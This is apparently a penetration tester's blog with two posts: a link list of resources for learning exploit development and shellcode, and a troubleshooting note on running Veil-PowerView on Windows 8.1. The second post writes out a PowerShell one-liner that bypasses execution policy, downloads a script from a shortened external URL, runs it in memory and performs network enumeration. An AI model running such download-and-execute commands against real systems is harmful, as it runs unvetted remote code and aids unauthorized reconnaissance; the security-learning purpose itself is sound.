Jumping into exploit development

I have done a little bit of exploit development over the years starting with stack overflows, reading Hacking The Art of Exploitation, The Shellcoders Handbook Second Edition, and some CTF related stuff but I really had let my skills fall stale in the last few years. I went seeking out resources to freshen up my knowledge and found that it was spread out all over the place. So I figured why not put them all together for anybody looking to refresh their memory or just get started learning. I feel that at least a fundamental understanding of exploit development at the very least enough to make modification to public exploits is necessary for anybody seeking a career in penetration testing. Also it’s just downright fun to play around in a debugger.

Books

A couple of books that I referenced above that got me started  and can give you a great foundation

Hacking the Art of ExploitationThe Shellcoders Handbook 2nd Edition

Shellcode

You going to need to learn some assembly to understand what you are seeing in the debugger and also for writing your own custom shellcode:

A great place to start is with securitytube.net that offers a great class on assembly language

Securitytube Windows assembly language megaprimer can be found here 

Securitytube Linux assembly language megaprimer can be found here

You can then follow this up with the Securitytube buffer overflow for Linux megaprimer here

The Shellcoders handbook serves as a great resource which you can buy from Amazon

Shellcoding for Linux and Windows tutorials be found here

The project shellcode tutorials can be found here

Windows exploitation

Of course first and foremost @corelancod3r has some excellent material you can find here

fuzzsecurity has some great stuff as well here

Opensecurity training @opensectraining offers a great wealth of information on the topic here

Opensecurity training also has a video series to accompany some of the topics that I found very useful here

A wiki on metasploit that has some great info can be found here

A great @metasploit post about stack overflows that is very detailed can be found here

The grey corner posts some detailed material

  • Stack based overflows here
  • SEH stack based overflows here

Linux exploitation

Fuzzysecurity also offers material on Linux exploit development here

Corelan coder does the same with his Linux exploit material here

Exploit databases

Exploit databases can be a great place to see already working and public exploit code. Taking a look at code and understanding it can be a big step towards writing your own successful exploit code.

Some sites to find exploit code:

@exploitdb run by Offensive Security(@offsectraininghere

@Rapid7 provides some good information including available modules for metasploit here

There are probably many more good resources out there so feel free to tweet me. I love to post resources to help people find good material that has helped me so you will probably see a lot of that on this blog. I hope this list grows as people give me suggestions.

Running Veil-Powerview on Windows 8.1 + Server 2012

I ran into a little problem when attempting to run Veil-Powerview on a Windows 8.1 box running Powershell version 4 that also included some issues with running shells remotely. I just wanted to share my findings. Not anything astounding but I hope I can save somebody some time. I wanted to run powerview in memory by pulling it down from the web as shown in the @harmj0y article here. The command is as follows

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mYPUO4‘); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt”

Powerview error

But powershell doesn’t seem to happy at all and vomits errors all over my screen. The error states that you need to add the -Version 2 option. Let’s have a go and see if it works:

fix

So It seems that after that Powerview goes about it’s merry way and it does but this is just running it on a local machine in front of me. So nothing mind blowing here but I did a little research further to discover how to do this when running a remote session and found this Technet article. I’m going to continue looking into this and possibly script something up to assist with running post exploitation tools on clients running powershell 4.

Update:

So I reported the error to @harmj0y  and he has added a warning to veil-powerview to make sure everybody knows to add -Version 2. it’s shown here:

warning veil fix by harmj0y

I’m going to do more research to see if this argument can be forced in some way.